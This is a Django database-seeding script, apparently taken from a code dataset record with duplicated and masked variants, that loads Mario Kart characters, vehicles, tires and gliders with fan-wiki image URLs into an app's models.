'https://static.wikia.nocookie.net/mariokart/images/e/ef/WaddleWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125901'
,
'https://static.wikia.nocookie.net/mariokart/images/6/6e/PeachParasolGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125940'
,
'https://static.wikia.nocookie.net/mariokart/images/d/dd/ParachuteGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125823'
,
'https://static.wikia.nocookie.net/mariokart/images/c/c4/ParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125830'
,
'https://static.wikia.nocookie.net/mariokart/images/b/b3/FlowerGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125846'
,
'https://static.wikia.nocookie.net/mariokart/images/f/f7/BowserKiteMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125909'
,
'https://static.wikia.nocookie.net/mariokart/images/c/ca/PlaneGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125930'
,
'https://static.wikia.nocookie.net/mariokart/images/9/96/MKTVParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125947'
,
'https://static.wikia.nocookie.net/mariokart/images/1/18/GoldGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125956'
,
'https://static.wikia.nocookie.net/mariokart/images/6/62/MK8_HylianKite.png/revision/latest/scale-to-width-down/100?cb=20150331232731'
,
'https://static.wikia.nocookie.net/mariokart/images/3/39/MK8D_Paraglider.png/revision/latest/scale-to-width-down/117?cb=20200726155246'
,
'https://static.wikia.nocookie.net/mariokart/images/0/0e/PaperGliderIcon-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426181313'
]
x = 0
y = 0
for char in char_names:
index = x - y + 1
name = char_names[x]
if 'Yoshi (' in name or 'Shyguy (' in name or '(G)' in name:
y += 1
index = None
new_char = Character(name=char_names[x], image_url=char_urls[x], index=
index)
new_char.save()
x += 1
x = 0
for tire in tire_names:
index = x + 1
new_tire = Tire(name=tire_names[x], image_url=tire_urls[x], index=index)
new_tire.save()
x += 1
x = 0
for car in car_names:
index = x + 1
new_car = Vehicle(name=car_names[x], image_url=car_urls[x], index=index)
new_car.save()
x += 1
x = 0
for glider in glider_names:
index = x + 1
new_glider = Glider(name=glider_names[x], image_url=glider_urls[x],
index=index)
new_glider.save()
x += 1
<|reserved_special_token_1|>
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE','mkrandom.settings')
import django
django.setup()
from main.models import Character, Vehicle, Tire, Glider
char_names = [
'Mario',
'Luigi',
'Peach',
'Daisy',
'Rosalina',
'Mario Tanooki',
'Peach cat',
'Yoshi',
'Yoshi (LBlue)',
'Yoshi (Black)',
'Yoshi (Rose)',
'Yoshi (Yellow)',
'Yoshi (White)',
'Yoshi (Blue)',
'Yoshi (Rose)',
'Yoshi (Orange)',
'Toad',
'Koopa',
'Shyguy',
'Shyguy (LB)',
'Shyguy (Black)',
'Shyguy (Rose)',
'Shyguy (Yellow)',
'Shyguy (White)',
'Shyguy (Blue)',
'Shyguy (Rose)',
'Shyguy (Orange)',
'Lakitu',
'Toadette',
'Boo',
'Baby Mario',
'Baby Luigi',
'Baby Peach',
'Baby Daisy',
'Baby Rosalina',
'Metal Mario',
'Golden Mario',
'Golden Peach',
'Wario',
'Waluigi',
'Donkey Kong',
'Bowser',
'Skelerex',
'Bowser Jr',
'Dry Bowser',
'Lemmy',
'Larry',
'Wendy',
'Ludwig',
'Iggy',
'Roy',
'Morton',
'Inkling (G)',
'Inkling (B)',
'Link (SSBU)',
'Link (BOTW)',
'Villager (B)',
'Villager(G)',
'Mary',
]
char_urls = [
'https://static.wikia.nocookie.net/heros/images/9/94/Mario_and_Sonic_Tokyo_2020_Mario_artwork.png/revision/latest?cb=20210410003745&path-prefix=fr',
'https://freepngimg.com/thumb/categories/462.png',
'https://static.wikia.nocookie.net/smashbros/images/0/06/Peach_SMP.png/revision/latest?cb=20190420130956&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/6/6c/Artwork_Daisy_MP10.png/revision/latest?cb=20171021130941&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/1/17/Harmonie_The_Top_100.png/revision/latest?cb=20171021123917&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/3/33/Mario_tanuki_-_SM3DL.png/revision/latest/scale-to-width-down/250?cb=20190409114830&path-prefix=fr',
'https://i.pinimg.com/originals/7d/5d/d8/7d5dd803a6eaad9e7491ed59f184eb39.png',
'https://www.seekpng.com/png/full/15-156558_ground-pound-yoshi-super-mario-yoshi-png.png',
'https://static.wikia.nocookie.net/hello-yoshi/images/f/fb/ACL_MK8_Light_Blue_Yoshi.png/revision/latest?cb=20180325192809',
'https://www.123-stickers.com/5731-6069-large/Array.jpg',
'https://static.wikia.nocookie.net/supermariorun/images/3/32/Yoshi_rouge.PNG/revision/latest?cb=20190427132857&path-prefix=fr',
'https://static.wikia.nocookie.net/supermariorun/images/9/94/Yoshi_jaune.PNG/revision/latest?cb=20190427132253&path-prefix=fr',
'https://static.wikia.nocookie.net/yoshi/images/b/b9/Yoshi_blanc.png/revision/latest?cb=20181128092526&path-prefix=fr',
'https://mario.wiki.gallery/images/thumb/9/9a/MKT_Artwork_BlueYoshi.png/129px-MKT_Artwork_BlueYoshi.png',
'https://e7.pngegg.com/pngimages/860/699/png-clipart-mario-yoshi-yoshi-s-story-super-mario-world-2-yoshi-s-island-yoshi-s-woolly-world-yoshi-s-new-island-yoshi-nintendo-computer-wallpaper.png',
'https://static.wikia.nocookie.net/yoshi/images/a/a4/Orange-yoshi-yoshi-29007923-415-479.png/revision/latest?cb=20201026191941&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/e/e4/SMRToad.png/revision/latest?cb=20161123170829&path-prefix=fr',
'https://static.wikia.nocookie.net/smashbros/images/e/ed/Art_Koopa_NSMB.png/revision/latest?cb=20131223214127&path-prefix=fr',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/d585815f-9fc0-440f-9949-a4a9c06bb713/db7whvu-94fc7f0d-1dea-47aa-922d-428a26ed8480.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcL2Q1ODU4MTVmLTlmYzAtNDQwZi05OTQ5LWE0YTljMDZiYjcxM1wvZGI3d2h2dS05NGZjN2YwZC0xZGVhLTQ3YWEtOTIyZC00MjhhMjZlZDg0ODAucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.iNMsbFuXa43xVer7q_c2UB65P2wAVONONt-wrMHozjo',
'https://i.pinimg.com/originals/58/69/c3/5869c3396ea69ca97c76f0b725099aa9.png',
'https://static.wikia.nocookie.net/supermarioexploration/images/8/8e/18B83E32-0819-4994-A3F8-E90CC35AB8AC.png/revision/latest/scale-to-width-down/872?cb=20180607214102',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dw0-1d608b14-5aba-43f7-b4a8-e855207824c1.png/v1/fill/w_600,h_815,strp/super_mario__green_shy_guy_2d_by_joshuat1306_dcz4dw0-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHcwLTFkNjA4YjE0LTVhYmEtNDNmNy1iNGE4LWU4NTUyMDc4MjRjMS5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.RxuED4zTRqJT-3TAQ8iHGS6zpoDw4O4DIKFQ8cKWpSM',
'https://static.miraheze.org/drmarioworldwiki/thumb/9/9a/Cha_sub_shyguyYellow.png/144px-Cha_sub_shyguyYellow.png',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz564x-7c505016-32d8-4268-b44e-358edcb1b10d.png/v1/fill/w_600,h_815,strp/super_mario__white_shy_guy_2d_by_joshuat1306_dcz564x-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o1NjR4LTdjNTA1MDE2LTMyZDgtNDI2OC1iNDRlLTM1OGVkY2IxYjEwZC5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.gLfujNRPJ5nNiOq-siQUD6ifo28x0oQHEB4PrpNHqFk',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dqq-95483c93-ee74-4ca0-a820-3287359457a3.png/v1/fill/w_600,h_815,strp/super_mario__blue_shy_guy_2d_by_joshuat1306_dcz4dqq-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHFxLTk1NDgzYzkzLWVlNzQtNGNhMC1hODIwLTMyODczNTk0NTdhMy5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.w1w6wZOiQ0oxfwNTiiuFy2Ph6yO6mN99-U_HYKZdZyQ',
'https://static.wikia.nocookie.net/paper-shin-aka-keroro-gunsou/images/f/f0/Pink_Shy_Guy_dance.png/revision/latest/scale-to-width-down/250?cb=20210525165708',
'https://static.wikia.nocookie.net/fantendo/images/f/ff/ShyGuyn_s._Png/revision/latest/scale-to-width-down/250?cb=20121222235649',
'https://static.wikia.nocookie.net/fantendo/images/e/eb/Cloudless_Lakitu.png/revision/latest/scale-to-width-down/250?cb=20120809192910',
'https://static.wikia.nocookie.net/mario/images/b/b2/ToadetteMP10.png/revision/latest?cb=20190609122040&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/a/a1/Boo_CTTT.png/revision/latest?cb=20210504081014',
'https://static.wikia.nocookie.net/videogames-fanon/images/d/d9/BabySit.png/revision/latest?cb=20120930205222',
'https://i.pinimg.com/originals/c8/4d/1f/c84d1f11741ee80b7bbda79a449917ab.png',
'https://www.pngkit.com/png/full/436-4365611_download-zip-archive-baby-peach-mario-bros.png',
'https://static.wikia.nocookie.net/fantendo/images/b/be/Baby_Daisy.png/revision/latest?cb=20210119015117',
'https://mario.wiki.gallery/images/3/33/MKT_Artwork_BabyRosalina.png',
'https://static.wikia.nocookie.net/mario/images/7/7e/Metal_Mario_Artwork_2_-_Mario_Kart_7.png/revision/latest?cb=20120513171323',
'https://static.wikia.nocookie.net/mario/images/1/10/MGWT_Gold_Mario.png/revision/latest?cb=20190317040405',
'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/0e738c17-7f3c-422e-8225-f8c782b08626/deg7wos-27ff3182-82ba-43ab-b5c0-f05cbec329f2.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcLzBlNzM4YzE3LTdmM2MtNDIyZS04MjI1LWY4Yzc4MmIwODYyNlwvZGVnN3dvcy0yN2ZmMzE4Mi04MmJhLTQzYWItYjVjMC1mMDVjYmVjMzI5ZjIucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.bK3J5_NJrKn-JHsqIxEUCjBiXqM4dMnBho-b2lJ6sK8',
'https://www.smashbros.com/assets_v2/img/fighter/wario/main2.png',
'https://static.wikia.nocookie.net/wario/images/8/8a/Waluigi%28SMP%290.png/revision/latest?cb=20180929091141',
'https://static.wikia.nocookie.net/heroes-fr/images/5/5c/Donkey_Kong.png/revision/latest?cb=20201122110342&path-prefix=fr',
'https://static.wikia.nocookie.net/epicpixelbattles/images/0/0b/Bowser-png-clipart-removebg-preview.png/revision/latest?cb=20201013093525',
'https://static.wikia.nocookie.net/mario/images/1/12/MPSRSkelerex.png/revision/latest/scale-to-width-down/2000?cb=20161015183419&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/0/07/Art_Bowser_Jr_SPM.png/revision/latest?cb=20181112222531&path-prefix=fr',
'https://mario.wiki.gallery/images/thumb/9/9d/Dry_Bowser_Artwork.png/250px-Dry_Bowser_Artwork.png',
'https://www.pngkey.com/png/full/563-5634904_super-mario-odyssey-lemmy-mario-kart-8-deluxe.png',
'https://static.wikia.nocookie.net/mariokart/images/4/42/LarryKoopa.png/revision/latest?cb=20140313170129',
'https://mario.wiki.gallery/images/thumb/9/95/NSMBW_Wendy_Artwork.png/1200px-NSMBW_Wendy_Artwork.png',
'https://static.wikia.nocookie.net/mario-fr/images/f/f6/1-1571859148.png/revision/latest?cb=20191023193229&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/4/4c/Iggy_NSMBU.png/revision/latest?cb=20171208215237&path-prefix=fr',
'https://static.wikia.nocookie.net/mario-fr/images/f/fb/2.png/revision/latest?cb=20191023191713&path-prefix=fr',
'https://static.wikia.nocookie.net/fantendo/images/4/4f/Morton_Koopa_Jr_3D.png/revision/latest?cb=20110403192112',
'https://static.wikia.nocookie.net/mario/images/2/2e/Inkling_SSBU.png/revision/latest?cb=20200216081405',
'https://i.pinimg.com/originals/7c/ce/f8/7ccef872fcee2e11945c6799ce2985cc.png',
'https://www.seekpng.com/png/full/7-73001_link-zelda-png-super-smash-bros-for-wii.png',
'https://static.wikia.nocookie.net/versus-compendium/images/0/00/Link_BotW.png/revision/latest?cb=20181128185543',
'https://static.wikia.nocookie.net/nintendo/images/1/1d/Villager-Boy-1.png/revision/latest?cb=20150419125930&path-prefix=en',
'https://i.pinimg.com/originals/bb/ca/f7/bbcaf749d9dc2d1b1259e8fe5cb49769.png',
'https://static.wikia.nocookie.net/nintendo-univers/images/a/a9/Marie_ACAF_3.png/revision/latest?cb=20161221163100&path-prefix=fr',
]
car_names = [
'Standard Kart',
'Pipe Frame',
'Mach 8',
'Steel Driver',
'Cat Cruiser',
'Circuit Special',
'Tri-Speeder',
'Badwagon',
'Prancer',
'Biddybuggy',
'Landship',
'Sneeker',
'Sports Coupe',
'Gold Standard',
'GLA',
'W 25 Silver Arrow',
'300 SL Roadster',
'Blue Falcon',
'Tanooki Kart',
'B Dasher',
'Streetle',
'P-Wing',
'Koopa Clown',
'Standard Bike',
'Comet',
'Sport Bike',
'The Duke',
'Flame Rider',
'Varmint',
'Mr. Scooty',
'Jet Bike',
'Yoshi Bike',
'Master Cycle',
'Master Cycle Zero',
'City Tripper',
'Standard ATV',
'Wild Wiggler',
'Teddy Buggy',
'Bone Rattler',
'Splat Buggy',
'Inkstriker',
]
car_urls = [
'https://static.wikia.nocookie.net/mariokart/images/0/05/StandardKartBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20140715154926',
'https://static.wikia.nocookie.net/mariokart/images/d/d1/PipeFrameBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122932',
'https://static.wikia.nocookie.net/mariokart/images/d/df/Mach8BodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122956',
'https://static.wikia.nocookie.net/mariokart/images/9/94/Steel_Driver.png/revision/latest/scale-to-width-down/100?cb=20200925190921',
'https://static.wikia.nocookie.net/mariokart/images/f/f4/CatCruiserBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123132',
'https://static.wikia.nocookie.net/mariokart/images/6/6c/CircuitSpecialBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123237',
'https://static.wikia.nocookie.net/mariokart/images/5/56/TrispeederBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123217',
'https://static.wikia.nocookie.net/mariokart/images/c/c2/BadwagonBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123350',
'https://static.wikia.nocookie.net/mariokart/images/f/ff/PrancerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123333',
'https://static.wikia.nocookie.net/mariokart/images/4/45/BiddybuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123322',
'https://static.wikia.nocookie.net/mariokart/images/6/6d/LandshipBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123656',
'https://static.wikia.nocookie.net/mariokart/images/4/47/SneakerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123617',
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SportsCoupeMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123625',
'https://static.wikia.nocookie.net/mariokart/images/3/31/MK8Gold_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102123637',
'https://static.wikia.nocookie.net/mariokart/images/c/c2/GLA-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140333',
'https://static.wikia.nocookie.net/mariokart/images/2/25/W25SilverArrow-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332',
'https://static.wikia.nocookie.net/mariokart/images/1/17/300SLRoadster-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332',
'https://static.wikia.nocookie.net/mariokart/images/e/ed/MK8_BlueFalcon.png/revision/latest/scale-to-width-down/100?cb=20150331235059',
'https://static.wikia.nocookie.net/mariokart/images/d/d7/MK8_TanookiBuggy.png/revision/latest/scale-to-width-down/100?cb=20150331235545',
'https://static.wikia.nocookie.net/mariokart/images/3/32/MK8_BDasher.png/revision/latest/scale-to-width-down/100?cb=20150401000836',
'https://static.wikia.nocookie.net/mariokart/images/c/cf/MK8Streetle.png/revision/latest/scale-to-width-down/100?cb=20150426174005',
'https://static.wikia.nocookie.net/mariokart/images/c/cd/MK8PWing.png/revision/latest/scale-to-width-down/100?cb=20150426174107',
'https://static.wikia.nocookie.net/mariokart/images/7/70/MK8DX_Koopa_Clown.png/revision/latest/scale-to-width-down/100?cb=20170704061052',
'https://static.wikia.nocookie.net/mariokart/images/8/84/StandardBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123849',
'https://static.wikia.nocookie.net/mariokart/images/0/0e/CometBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124024',
'https://static.wikia.nocookie.net/mariokart/images/f/fe/SportBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123857',
'https://static.wikia.nocookie.net/mariokart/images/8/8a/TheDukeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925174819',
'https://static.wikia.nocookie.net/mariokart/images/3/31/FlameRiderBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123942',
'https://static.wikia.nocookie.net/mariokart/images/d/d0/VarmintBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123951',
'https://static.wikia.nocookie.net/mariokart/images/1/18/MrScootyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123925',
'https://static.wikia.nocookie.net/mariokart/images/1/12/JetBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123928',
'https://static.wikia.nocookie.net/mariokart/images/6/62/YoshiBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925193256',
'https://static.wikia.nocookie.net/mariokart/images/5/52/MK8_MasterCycle.png/revision/latest/scale-to-width-down/100?cb=20150331231734',
'https://static.wikia.nocookie.net/mariokart/images/3/3e/150px-MK8D_Master_Cycle_Zero.png/revision/latest/scale-to-width-down/111?cb=20200726154936',
'https://static.wikia.nocookie.net/mariokart/images/9/90/MK8CityTripper.png/revision/latest/scale-to-width-down/100?cb=20150426175601',
'https://static.wikia.nocookie.net/mariokart/images/2/23/StandardATVBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124111',
'https://static.wikia.nocookie.net/mariokart/images/a/aa/WildWigglerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925175122',
'https://static.wikia.nocookie.net/mariokart/images/f/fa/TeddyBuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124120',
'https://static.wikia.nocookie.net/mariokart/images/0/0a/MK8BoneRattler.png/revision/latest/scale-to-width-down/100?cb=20150426180108',
'https://static.wikia.nocookie.net/mariokart/images/6/63/MK8DX_Splat_Buggy.png/revision/latest/scale-to-width-down/100?cb=20170706064814',
'https://static.wikia.nocookie.net/mariokart/images/e/eb/MK8DX_Inkstriker.png/revision/latest/scale-to-width-down/100?cb=20170706065507',
]
tire_names = [
'Standard',
'Monster',
'Roller',
'Slim',
'Slick',
'Metal',
'Button',
'Off-Road',
'Sponge',
'Wood',
'Cushion',
'Blue Standard',
'Hot Monster',
'Azure Roller',
'Crimson Slim',
'Cyber Slick',
'Retro Off-Road',
'Gold Tires',
'GLA Tires',
'Triforce Tires',
'Ancient Tyres',
'Leaf Tires',
]
tire_urls = [
'https://static.wikia.nocookie.net/mariokart/images/a/a8/StandardTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125545',
'https://static.wikia.nocookie.net/mariokart/images/2/29/MonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125541',
'https://static.wikia.nocookie.net/mariokart/images/7/76/RollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125539',
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125536',
'https://static.wikia.nocookie.net/mariokart/images/d/dd/SlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125542',
'https://static.wikia.nocookie.net/mariokart/images/9/96/MetalTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124533',
'https://static.wikia.nocookie.net/mariokart/images/0/07/ButtonTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124541',
'https://static.wikia.nocookie.net/mariokart/images/2/25/Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102124559',
'https://static.wikia.nocookie.net/mariokart/images/4/4c/SpongeTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124549',
'https://static.wikia.nocookie.net/mariokart/images/0/03/WoodTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124724',
'https://static.wikia.nocookie.net/mariokart/images/9/92/CushionTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124817',
'https://static.wikia.nocookie.net/mariokart/images/d/db/Blue_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102124836',
'https://static.wikia.nocookie.net/mariokart/images/d/d1/HotMonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124834',
'https://static.wikia.nocookie.net/mariokart/images/f/fe/AzureRollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20200726154338',
'https://static.wikia.nocookie.net/mariokart/images/7/71/CrimsonSlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125627',
'https://static.wikia.nocookie.net/mariokart/images/2/29/CyberSlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125626',
'https://static.wikia.nocookie.net/mariokart/images/4/48/Retro_Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102125629',
'https://static.wikia.nocookie.net/mariokart/images/5/52/Gold_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20141102125630',
'https://static.wikia.nocookie.net/mariokart/images/b/ba/GLATires-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180539',
'https://static.wikia.nocookie.net/mariokart/images/0/09/MK8_TriforceTires.png/revision/latest/scale-to-width-down/100?cb=20150331233357',
'https://static.wikia.nocookie.net/mariokart/images/d/d5/MK8D_Ancient_Tires.png/revision/latest/scale-to-width-down/100?cb=20200726154442',
'https://static.wikia.nocookie.net/mariokart/images/f/f9/Leaf_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180810',
]
glider_names = [
'Super Glider',
'Cloud Glider',
'Wario Wing',
'Waddle Wing',
'Peach Parasol',
'Parachute',
'Parafoil',
'Flower Glider',
'Bowser Kite',
'Plane Glider',
'MKTV Parafoil',
'Gold Glider',
'Hylian Kite',
'Paraglider',
'Paper Glider',
]
glider_urls = [
'https://static.wikia.nocookie.net/mariokart/images/a/a8/SuperGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125815',
'https://static.wikia.nocookie.net/mariokart/images/8/84/Cloud_Glider.png/revision/latest/scale-to-width-down/100?cb=20141102125838',
'https://static.wikia.nocookie.net/mariokart/images/a/ae/WarioWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125853',
'https://static.wikia.nocookie.net/mariokart/images/e/ef/WaddleWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125901',
'https://static.wikia.nocookie.net/mariokart/images/6/6e/PeachParasolGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125940',
'https://static.wikia.nocookie.net/mariokart/images/d/dd/ParachuteGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125823',
'https://static.wikia.nocookie.net/mariokart/images/c/c4/ParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125830',
'https://static.wikia.nocookie.net/mariokart/images/b/b3/FlowerGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125846',
'https://static.wikia.nocookie.net/mariokart/images/f/f7/BowserKiteMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125909',
'https://static.wikia.nocookie.net/mariokart/images/c/ca/PlaneGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125930',
'https://static.wikia.nocookie.net/mariokart/images/9/96/MKTVParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125947',
'https://static.wikia.nocookie.net/mariokart/images/1/18/GoldGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125956',
'https://static.wikia.nocookie.net/mariokart/images/6/62/MK8_HylianKite.png/revision/latest/scale-to-width-down/100?cb=20150331232731',
'https://static.wikia.nocookie.net/mariokart/images/3/39/MK8D_Paraglider.png/revision/latest/scale-to-width-down/117?cb=20200726155246',
'https://static.wikia.nocookie.net/mariokart/images/0/0e/PaperGliderIcon-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426181313',
]
x=0
y=0
for char in char_names:
index=x-y+1
name = char_names[x]
if "Yoshi (" in name or "Shyguy (" in name or "(G)" in name:
y+=1
index=None
new_char = Character(name=char_names[x],image_url=char_urls[x],index=index)
new_char.save()
x+=1
x=0
for tire in tire_names:
index=x+1
new_tire = Tire(name=tire_names[x],image_url=tire_urls[x],index=index)
new_tire.save()
x+=1
x=0
for car in car_names:
index=x+1
new_car = Vehicle(name=car_names[x],image_url=car_urls[x],index=index)
new_car.save()
x+=1
x=0
for glider in glider_names:
index=x+1
new_glider = Glider(name=glider_names[x],image_url=glider_urls[x],index=index)
new_glider.save()
x+=1
|
flexible
|
{
"blob_id": "dbda5df7dff3f8acc320ffe7b9c7c279ebed2cc2",
"index": 7108,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mkrandom.settings')\n<mask token>\ndjango.setup()\n<mask token>\nfor char in char_names:\n index = x - y + 1\n name = char_names[x]\n if 'Yoshi (' in name or 'Shyguy (' in name or '(G)' in name:\n y += 1\n index = None\n new_char = Character(name=char_names[x], image_url=char_urls[x], index=\n index)\n new_char.save()\n x += 1\n<mask token>\nfor tire in tire_names:\n index = x + 1\n new_tire = Tire(name=tire_names[x], image_url=tire_urls[x], index=index)\n new_tire.save()\n x += 1\n<mask token>\nfor car in car_names:\n index = x + 1\n new_car = Vehicle(name=car_names[x], image_url=car_urls[x], index=index)\n new_car.save()\n x += 1\n<mask token>\nfor glider in glider_names:\n index = x + 1\n new_glider = Glider(name=glider_names[x], image_url=glider_urls[x],\n index=index)\n new_glider.save()\n x += 1\n",
